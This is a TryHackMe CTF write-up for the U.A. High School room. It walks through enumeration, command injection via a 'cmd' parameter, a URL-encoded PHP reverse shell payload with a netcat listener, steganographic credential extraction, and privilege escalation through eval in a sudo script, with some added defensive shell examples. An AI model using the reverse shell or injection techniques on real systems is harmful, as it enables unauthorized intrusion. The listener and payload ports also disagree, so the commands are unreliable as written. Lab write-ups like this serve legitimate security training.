U.A. High School THM Challenge Writeup

Nirmal S

Hello everyone, after a long break I am writing this writeup on the U.A. High School CTF from TryHackMe.

Step 1: Port Scanning

Use nmap or rustscan to scan for open ports.

┌──(kali㉿kali)-[~]
└─$ nmap -sCV -Pn 10.10.191.158
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-14 09:39 EDT
Nmap scan report for 10.10.191.158
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:d0:45:7d:66:10:6f:f8:29:80:70:bb:b3:49:7e:aa (RSA)
|   256 2a:d2:b4:d8:ec:ba:b5:04:b7:58:b4:f1:80:10:24:96 (ECDSA)
|_  256 98:05:3f:ba:7c:52:42:50:ae:27:3a:8b:2c:8a:06:45 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: U.A. High School
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.55 seconds

The scan shows that ports 22 (SSH) and 80 (HTTP) are open. Open the site in a web browser and look at the page.

Step 2: Path and Subdomain Finding

Use tools like gobuster, dirb, dirbuster, ffuf or feroxbuster. I used dirb, and it quickly found the /assets/ path.

┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.191.158

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jun 14 09:42:23 2025
URL_BASE: http://10.10.191.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.191.158/ ----
==> DIRECTORY: http://10.10.191.158/assets/

Append the identified path to the IP address in the browser and a blank page is displayed.

Next, run the enumeration tools mentioned above against this new path to find further paths.

This turned up a file named index.php under /assets/.

┌──(kali㉿kali)-[/usr/share/wordlists/dirb]
└─$ gobuster dir -u http://10.10.191.158/assets/ -w=/usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.191.158/assets/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/images               (Status: 301) [Size: 322] [--> http://10.10.191.158/assets/images/]
/index.php            (Status: 200) [Size: 0]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

As before, a blank page is displayed. I repeated the same enumeration process against it, but it gave no lead.

After a few tries, I had the idea of passing a command to index.php as a query parameter, like this:

?cmd=whoami/pwd/ls

Step 3: Getting Reverse Shell

I used a PHP reverse shell payload from revshell with a netcat listener to get a shell back.

php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.10.10%22%2C9001%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
rlwrap nc -lvnp 1337

This gave us a reverse shell.

Step 4: Finding Credentials

Moving up from the current directory, I found a directory under /var/www/ containing a .txt file with a base64-encoded password. Save that password.

I navigated to /var/www/html/assets/images/ and found two image files. I downloaded them with wget and checked their file types; one did not match the format its extension claimed.

www-data@ip-10-10-191-158:/var/www/html/assets/images$ ls
ls
oneforall.jpg  yuei.jpg
┌──(kali㉿kali)-[~]
└─$ file oneforall.jpg 
oneforall.jpg: data

Fix this with the hexeditor tool by restoring the JPEG (JFIF) header: add the bytes below as the first line of the file.

FF D8 FF E0 00 10 4A 46 49 46 00 01
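As an added example that is not part of the writeup, here is a small POSIX shell script that performs the same check and repair: it tests for the JPEG magic bytes and writes the 12-byte JFIF header above over the clobbered first line. It assumes the original header bytes were overwritten in place (file size unchanged) rather than stripped.

```shell
# Constructed example: detect a JPEG whose JFIF header was overwritten
# and rewrite the 12 bytes the hexeditor step restores.

# FF D8 (SOI), FF E0 (APP0), 00 10 (length), "JFIF\0", 00 01 (version).
jfif_header() {
    printf '\377\330\377\340\000\020JFIF\000\001'
}

# First N bytes of file $1 as lowercase hex, no spaces: hex_head FILE N
hex_head() {
    head -c "$2" "$1" | od -An -tx1 -v | tr -d ' \n'
}

# Succeeds only if the file starts with the JPEG SOI marker FF D8.
has_jpeg_magic() {
    [ "$(hex_head "$1" 2)" = "ffd8" ]
}

# Write a valid JFIF header followed by everything after byte 12 of $1 into $2.
# Assumes the bad bytes replaced the header in place; if the header was cut
# off instead, concatenate the whole file rather than skipping 12 bytes.
repair_jfif_header() {
    { jfif_header; tail -c +13 "$1"; } > "$2"
}

# Self-check on a constructed file: 12 junk bytes then fake image data.
demo() {
    tmp=$(mktemp -d)
    printf 'XXXXXXXXXXXXfake-scanline-data' > "$tmp/broken.jpg"
    has_jpeg_magic "$tmp/broken.jpg" && echo "unexpected: already a JPEG"
    repair_jfif_header "$tmp/broken.jpg" "$tmp/fixed.jpg"
    has_jpeg_magic "$tmp/fixed.jpg" && echo "repaired: $(hex_head "$tmp/fixed.jpg" 12)"
    rm -rf "$tmp"
}
```

Run `file` on the repaired copy afterwards; it should now report JPEG image data instead of plain data.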

Save the file and use steghide to extract the hidden credentials, using the base64-encoded password as the passphrase.

steghide extract -sf <filename>

You can find the password for the user deku.

Step 5: User Flag

Log in over SSH as deku to find user.txt.

ssh deku@<ip>

Step 6: Root flag

Run the command below to list what this user is allowed to run as root via sudo:

sudo -l

This revealed an interesting directory, /opt/NewComponent, containing a feedback.sh script. Reviewing the code, I noticed it passes the user's input through eval, which can be exploited.

I ran the feedback.sh script with sudo and injected the following payload to modify the /etc/sudoers file.
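An added example, not the challenge's feedback.sh (whose contents the writeup does not show): a constructed script contrasting the eval pattern with the safe way to handle feedback text, plus a check a defender could use to flag input containing shell syntax before it is stored.

```shell
# Constructed example: why a script run under sudo must never pass user
# text through eval, and what the hardened version looks like.

# Vulnerable pattern: eval re-parses the string, so $var, $(...), ; and
# similar shell syntax inside the feedback is executed with the script's
# privileges (root, when the script is allowed via sudo).
record_feedback_unsafe() {
    eval "echo $1"
}

# Hardened pattern: printf '%s' treats the text purely as data; nothing
# in it is expanded or executed.
record_feedback_safe() {
    printf '%s\n' "$1"
}

# Succeeds if the feedback contains shell metacharacters. A defender can use
# this to log or reject suspicious submissions rather than storing them.
contains_shell_metachars() {
    case "$1" in
        *['$`;|&()<>']*) return 0 ;;
        *) return 1 ;;
    esac
}
```

Feeding both functions the literal text `Hello $HOME` shows the difference: the eval version prints the expanded home directory, the safe version prints the text unchanged.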

All the flags are found.

Key takeaways include:

  • Reverse Shell Connection: Successfully setting up a reverse shell with busybox netcat was crucial in gaining access to the target system.

  • File Analysis: Extracting and decoding hidden files from images highlighted the importance of thorough information gathering and file analysis.

  • Privilege Escalation: Identifying and exploiting the eval command in bash scripts demonstrated effective methods for privilege escalation.

Thank you.

Follow my socials:

https://www.linkedin.com/in/nirmal-s-738a60203/
